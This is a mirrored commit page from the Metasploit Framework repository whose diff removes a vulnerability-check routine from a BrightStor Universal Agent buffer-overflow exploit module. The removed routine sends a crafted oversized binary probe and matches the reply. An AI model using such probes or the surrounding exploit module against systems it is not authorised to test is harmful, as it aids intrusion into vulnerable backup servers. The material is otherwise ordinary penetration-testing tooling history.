mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Woops, tenable-license check blob
git-svn-id: file:///home/svn/incoming/trunk@3595 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
4b9033be00
commit
ca72b7e2ed
@ -52,26 +52,6 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
|
|||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
|
||||||
connect
|
|
||||||
probe = "\x00\x00\x00\x00\x03\x20\xbc\x02" +
|
|
||||||
("2" * 256) +
|
|
||||||
("A" * 32) +
|
|
||||||
"\x0B\x11\x0B\x0F\x03\x0E\x09\x0B" +
|
|
||||||
"\x16\x11\x14\x10\x11\x04\x03\x1C" +
|
|
||||||
"\x11\x1C\x15\x01\x00\x06" +
|
|
||||||
("X" * 390)
|
|
||||||
|
|
||||||
sock.put(probe)
|
|
||||||
resp = sock.get_once
|
|
||||||
disconnect
|
|
||||||
|
|
||||||
if (resp and resp == "\x00\x00\x73\x02\x32\x32\x00\x00")
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
Loading…
Reference in New Issue
Block a user